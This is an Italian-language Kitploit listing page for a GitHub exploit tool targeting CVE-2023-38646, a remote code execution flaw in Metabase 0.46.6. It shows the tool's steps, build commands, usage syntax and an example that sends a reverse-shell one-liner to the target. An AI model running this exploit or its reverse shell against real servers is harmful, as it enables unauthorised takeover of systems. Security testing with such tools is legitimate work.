Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-38646 — Exploit per CVE-2023-38646 in Metabase 0.46.6, che consente l'esecuzione remota di codice tramite richieste appositamente predisposte e recupero del token di configurazione. | Kitploit
Strumenti/GitHubGitHub/danithehack3r/cve-2023-38646
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingTrojan di Accesso Remoto
GitHubdanithehack3r/cve-2023-38646

CVE-2023-38646

Exploit per CVE-2023-38646 in Metabase 0.46.6, che consente l'esecuzione remota di codice tramite richieste appositamente predisposte e recupero del token di configurazione.

Vedi Repository
2 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-38646

Exploit per CVE-2023-38646 Metabase 0.46.6

Questo strumento sfrutta una vulnerabilità (CVE-2023-38646) in una piattaforma software. L'exploit consente l'esecuzione remota di codice tramite una richiesta appositamente predisposta, sfruttando una stringa di connessione al database gestita in modo non corretto.

Panoramica

Lo strumento:

  • Recupera il token di configurazione dall'URL di destinazione.
  • Codifica in Base64 il comando fornito.
  • Costruisce il payload con il comando codificato.
  • Invia il payload per sfruttare la vulnerabilità.

Installazione

Clona il repository:

root@kitploit:~
git clone https://github.com/SUT0L/CVE-2023-38646.git
cd CVE-2023-38646
go build -o exploit
chmod +x exploit

Utilizzo

root@kitploit:~
./exploit --url [TARGET_URL] --command [COMMAND] [--proxy PROXY_URL]

TARGET_URL: L'URL della piattaforma da scansionare e sfruttare. COMMAND: Il comando da eseguire sul target. PROXY_URL (Opzionale): L'URL del server proxy (es. http://127.0.0.1:8080). Se non fornito, non verrà utilizzato alcun proxy.

Esempio con una reverse shell sh

root@kitploit:~
./exploit --url https://example.com --command 'sh -i >& /dev/tcp/10.0.0.1/4444 0>&1' --proxy http://127.0.0.1:8080

Disclaimer

Questo strumento è destinato esclusivamente a scopi educativi e di ricerca. Assicurati sempre di avere la dovuta autorizzazione prima di scansionare o sfruttare qualsiasi target. L'uso improprio di questo strumento è strettamente contrario all'intenzione dello sviluppatore e potrebbe essere illegale.

Feedback e Contributi

Sentiti libero di aprire issue per qualsiasi feedback, bug o richiesta di funzionalità. Le pull request sono sempre benvenute!

Scarica lo strumento